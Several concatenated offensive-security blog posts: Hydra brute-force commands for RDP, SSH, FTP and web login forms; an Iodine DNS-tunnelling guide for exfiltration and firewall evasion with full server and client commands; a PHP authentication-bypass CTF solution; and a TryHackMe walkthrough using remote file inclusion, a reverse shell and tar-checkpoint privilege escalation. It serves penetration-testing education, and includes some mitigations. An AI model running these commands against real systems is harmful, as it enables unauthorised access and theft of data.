
Installing Hydra
Installing Hydra

Hydra For Brute Forcing RDP

Remote Desktop Protocol or RDP is a remote management tool primarily used in Windows environments. It uses terminal services to allow users to connect to the target host using the RDP Client. The user will then be presented with a visual representation of the desktop. Furthermore, this will allow them to carry out management tasks. RDP is often attacked by hackers using automated tools like Hydra. Please see below for the syntax on how to attack RDP. The uppercase L specifies the user wordlist, the uppercase P specifies the password wordlist. The lowercase variants will allow you to specify individual words. The -F flag tells Hydra to stop once it has found a correct password. Then we specify the protocol, the IP address, and the verbosity.

sudo hydra -L usernames.txt -P passwords.txt -F rdp://10.0.2.5 -V
Hydra Brute Forcing RDP
Hydra Brute Forcing RDP

Brute Forcing SSH

SSH or Secure Shell is another remote management protocol. It is found in Linux or Unix environments but has recently been added to Windows. Furthermore, it is considered the successor to telnet. Telnet doesn’t use encryption so everything is transmitted in plaintext. If a threat actor were on your network performing a man-in-the-middle attack, they would be able to see your username and password transmitted to the telnet server. SSH is an encrypted protocol so if traffic was interncepted, it couldn’t be read. You can perform brute force attacks against SSH like so:

sudo hydra -L username.txt -P passwords.txt -F ssh://10.0.2.5 -V
Brute Forcing SSH
Brute Forcing SSH

Brute Forcing FTP

FTP is a protocol for transferring files and can also be subject to brute force attacks by Hydra. The syntax will be exactly the same as RDP and SSH. Just replace the protocol for FTP. You will notice a pattern start to emerge for basic network services. There is a lot more to Hydra and you can fine-tune your attacks to be more specific. To perform a brute force attack against FTP:

Sudo hydra -L username.txt -P passwords.txt -F ftp://10.0.2.5 -V
Brute Forcing FTP
Brute Forcing FTP

Brute Forcing Web Applications

You can also brute force web applications. However, the syntax to do so is a bit more complicated. You would start as we have done previously by specifying the username and password wordlist. However, you now need to specify the type of web attack whether it’s an “http-post-form” or “http-get-form” or whether it’s using basic authentication. Then you need to specify the path to the file to attack. Next, you need to specify the parameters to attack (username and password). Furthermore, you need to specify placeholders for the user and pass variables. Finally, you need to specify any cookies. You can see an example of this below:

hydra -L users.txt -P password.txt 10.0.2.5  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
Damn Vulnerable Web App
Damn Vulnerable Web App

Hydra Graphical User Interface

There is a graphical user interface for Hydra. To launch it you need to run the xhydra command. If you prefer GUI’s then this could be your preferred method of using hydra. Personally I prefer using the command line, I genuinly find it easier to configure than the GUI.

Xhydra Gui
Xhydra Gui

Data Exfiltration, Firewall Evasion, and DNS Encapsulation with Iodine

Hello World and welcome to HaXeZ. Today I want to talk about the DNS tunneling software Iodine.  Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

My Current IP Address before Iodine
My Current IP Address before Iodine

Iodine Domain Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then create an NS (nameserver) record of dnstun and point it to the A record (dnstunip.haxr.one).

Iodine DNS Records
Iodine DNS Records

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
Iodine Server Set Up
Iodine Server Set Up

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Checking Iodine Server Configuration
Checking Iodine Server Configuration

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337 dnstun.haxr.one. 

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Set Up
Iodine Client Set Up

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP
Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected] 

where 10.0.0.1 is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding
SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Browser Proxy Settings
Browser Proxy Settings
What is my IP showing the IP of the server
What is my IP showing the IP of the server

Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

Hacking PHP Web Applications and Bypassing Authentication Mechanisms | Hack This Site – ExtBasic 6

Hello World and welcome to HaXeZ, today we’re going to be looking at Hack This Site ExtBasic 6. Solving this challenge requires some basic knowledge of PHP or any other language for that matter. It’s a simple challenge that shows how poorly coded web application authentication mechanisms can be bypassed.

The Challenge

The image below shows the PHP that makes up the authentication mechanism. Furthermore, This is the code that we need to exploit in order to bypass the authentication mechanism. The introduction text at the top explains that the sysadmin is a noob and that the script is located at http://moo.com/moo.php. Therefore, to solve this challenge we need to append the correct syntax to the end of the URL and submit it to the submission form.

The PHP Code
The PHP Code

The PHP Code

The snippet below is the exact code we’re going to be exploiting. Furthermore, there is no backend database to worry about, just some simple PHP logic that we can leverage for our own nefarious purposes.

<?php
        $user = $_GET['user'];
        $pass = $_GET['pass'];
        if (isAuthed($user,$pass))
        {
                $passed=TRUE;
        }
        if ($passed==TRUE)
        {
                echo 'you win';
        }
?>
        <form action="me.php" method="get">
        <input type="text" name="user" />
        <input type="password" name="pass" />
        </form>
<?php
        function isAuthed($a,$b)
        {
                return FALSE;
        }
?>

Breaking Down The Code

We’re going to break the code down line by line in order to solve this challenge. Once we understand what the code is doing, we will be able to use its own logic against it and bypass authentication.

First, the code starts with it a tag telling us what language it is.

<?php

Next, we have two variables being set from user input. The $user and $pass variables are populated by the values of ‘user’ and ‘pass’. This is more evident later on when looking at the HTML form.

$user = $_GET['user'];
$pass = $_GET['pass'];

This is where the logic beings. When the user submits their username and password, the data is passed to an if statement. If the values of the variables ‘$user’ and ‘$pass’ are correct then the variable ‘$passed’ is set to true.

if (isAuthed($user,$pass))
{
        $passed=TRUE;
} 

After that, the application uses another if statement to check whether the value of the variable ‘$passed’ is set to true. If ‘$passed’ is set to true then the application echos out “you win”. This also ends the first section of PHP.

if ($passed==TRUE)
{
        echo 'you win';
}
?>

Now, we move on to the HTML. This is the login form that the user will send when loading the page in their browser. It is fairly standard and just performs a get request to me.php. The contents of the get request or the values of the input for ‘user’ and ‘password’. The user input type is text and the password input type is password.

<form action="me.php" method="get">
<input type="text" name="user" />
<input type="password" name="pass" />
</form>

Finally, we have the last section of PHP. This is the function that checks to see whether the username and password are correct. This function compares the values of variables ‘$user’ and ‘$pass’ with the variables ‘$a’ and ‘$b’. If they match then it is the first if statement is executed.

<?php
        function isAuthed($a,$b)
        {
                return FALSE;
        }
?>

The Solution

With that rather long explanation out the way, we can now move on to solving the challenge. It’s pretty simple if you know how to PHP site URL’s work. We know that in order for us to authenticate, the variable ‘$passed’ needs to be set to ‘TRUE’

PHP allows you to specify variables and their contents in the URL. For example, a dynamic PHP website using a CMS like WordPress may have a URL like HTTP://site.com/index.php?page=1. The question mark indicates that what follows is a variable and in this case, the variable is ‘$page’. Furthermore, we can specify that we want the value of the page variable to be 1.

With this in mind, we can take the provided URL of HTTP://moo.com/moo.php and append a question mark followed by the variable passed equals TRUE, as seen below.

http://moo.com/moo.php?passed=TRUE

Submitting this to the input box will solve the challenge.

Hacking The Skynet Mainframe and Preventing Judgement Day

We took technology for granted. Laughed at the suffering of the robots we had enslaved. Dismissed the warnings of the mainstream media. If was over before it began. Skynet, an interconnected neural defense network became self-aware. We didn’t stand a chance.

I was sent back from the future by the leader of the resistance John Connor, my mission is to hack into the Skynet mainframe and destroy it before it becomes self-aware. I have infiltrated a Skynet data center and jacked into their network. If you’re listening to this, you are the resistance.

Hello World and welcome to HaXeZ. Cheesy intros aside, today we’re going to be hacking the Skynet box on TryHackMe.  I came upon this box while going through the Offensive Security Learning path. The Box was a lot of fun so I wanted to make a write-up and create a video about it. The foothold requires some enumeration of Samba and web services. Then exploiting an outdated Content Management System to perform local and remote file inclusion to gain a reverse shell.

Skynet Host Enumeration

I ran a Nmap scan with the safe scripts, service version, and Operating System detection flags set against all ports. The scan came back and revealed that SSH, Apache, Dovecot, and Samba were listening on the server. As a result, we have a large attack surface to go after. We could start by brute forcing SSH. However, as there are plenty of other services to go after let’s start with the web server.

Skynet Nmap Scan
Skynet Nmap Scan

Skynet Web Server Enumeration

The initial landing page of the web server appears to a Skynet search engine. However, submitting search parameters to the submission form didn’t appear to do anything. Therefore, I decided to run DIRB (with a custom wordlist) against the webserver to see if there were any juicy directories. While DIRB was running, I started to enumerate the Samba shares to see if I had access to anything.

Skynet Search Engine
Skynet Search Engine
Dirb Directory Brute Force
Dirb Directory Brute Force

SMB Enumeration

I used the tool smbclient with the list argument to list the shares that were exposed on the host. Notably, there were a number of shares available but the one named anonymous caught my eye. Perhaps this anonymous share would allow me to explore it without authenticating. Success, we were able to access the anonymous share and found a number of files including attention.txt, log1.txt, log2.txt, and log3.txt. The contents of the attention.txt document revealed that the host had recently encountered a misconfiguration and that all users needed to change their passwords. The text document was signed by none other than Miles Dyson. Furthermore, the log1.txt document contained a list of terminator names. Perhaps this was a password list.

smbclient SMB Enumeration
smbclient SMB Enumeration

Squirrelmail

Heading back to my DIRB scan I noticed that it had found a directory called SquirrelMail. Furthermore, upon visiting this directory we were greeted with a login page. With the username milesdyson and the log1.txt wordlist we found on the Samba share, I launched Burp Suite and started a brute force attack.

Squirrel Mail
Squirrel Mail

Comparing the results of the Burp Suite brute force attack revealed that one of the attempts was successful. The response length was different and the HTTP status code showed a 302 redirect instead of a 200 message. In other words, instead of loading a page with an error message saying the credentials were incorrect, it redirected me to the mail portal.

Burp Suite Brute Force
Burp Suite Brute Force

Samba Password

I read through Miles Dyson’s emails and noticed he had received an email from [email protected]. Additionally, this email was informing Mr. Dyson that his Samba password had been changed. The email actually included the new password. Loaded with that new information, I headed back to my terminal and attempted to mount the /milesdyson share with the milesdyson username and the new password. It worked! The share was full of documents about AI neural networks but there was also a text document named important.txt This new text document mentioned a Content Management System under a new directory. This directory was a random combination of letters and numbers so it is unlikely that a directory brute force attack would have found it.

Miles Dyson Samba Directory
Miles Dyson Samba Directory

Deeper Directories

Armed with this new directory, I ran another DIRB against it and found that there was a directory called administrator. Navigating to this directory loaded a new login portal for a Content Management System called Cuppa CMS.

Cuppa CMS
Cuppa CMS

After trying some basic credentials I went back to my terminal and used searchsploit to see if there were any vulnerabilities. Sure enough, there was a local and remote file inclusion vulnerability that would allow a threat actor to load local files on the system such as the passwd file as well as force the server to execute files hosted remotely.

SearchSploit
SearchSploit

Catching A Reverse Shell

After testing out the local file inclusion vulnerability, I headed to Pentestmonkey’s PHP reverse shell on Github.com. I grabbed the raw URL and downloaded it locally and then amended it to include my IP address and desired port of 443. Then I used the Python3 HTTP module to start a webserver on port 80. I created a NetCat listener on port 443 and then appended the link to the reverse shell into the Cuppa CMS URL. After hitting enter I was greeted with that glorious message of Connect to from unknown. The reverse shell had worked and I was now on the system.

Reverse Shell
Reverse Shell

Skynet System Enumeration

I poked around on the system for a bit and was able to capture the user flag from the milesdyson home directory. I also noticed a backup.sh file that appeared to be backing up everything in the /var/www/html directory with Tar. Furthermore, this backup.sh script was owned by root. I decided to cat out /etc/crontab to see whether this was running as a cron job. Sure enough, it was, the job was running as root every hour, minute, and second.

Skynet Enumeration
Skynet Enumeration

Privilege Escalation

The end to Skynet was within reach. I headed over to GTFO bins and searched for Tar. There was an entry for Tar using a feature called checkpoints. These checkpoints allow for the execution of arbitrary actions or commands. By creating a checkpoint I could instruct Tar to execute a command of my choosing. Based on a write-up on https://steflan-security.com I decided to create a bash script that copied /bin/bash to /tmp and then change the permissions to include the setUID bit. This means that when the backup.sh cron job runs, Tar would create a bash binary in /tmp that would elevate me to root. After a bit of trial and error, the exploit worked and by appending the -p argument I was able to get root and capture the root flag.

Privilege Escalation
Privilege Escalation

Conclusions

This was a great box and I loved the theme of it. I don’t know why but I always find boxes with a strong theme more engaging. It’s like the websites on hackthissite.org, if I’m supposed to be hacking some super evil person then I’m more inclined to succeed. Perhaps my imagination is running away with me. Either way, this is a great box, I would personally rank it as a medium difficulty box mainly because I struggled with the last step. I had to terminate (excuse the pun) the existing machine and start again to get it to work. I loved the remote file inclusion vulnerability, that was insanely cool. Anyway, until next time. Kind Regards.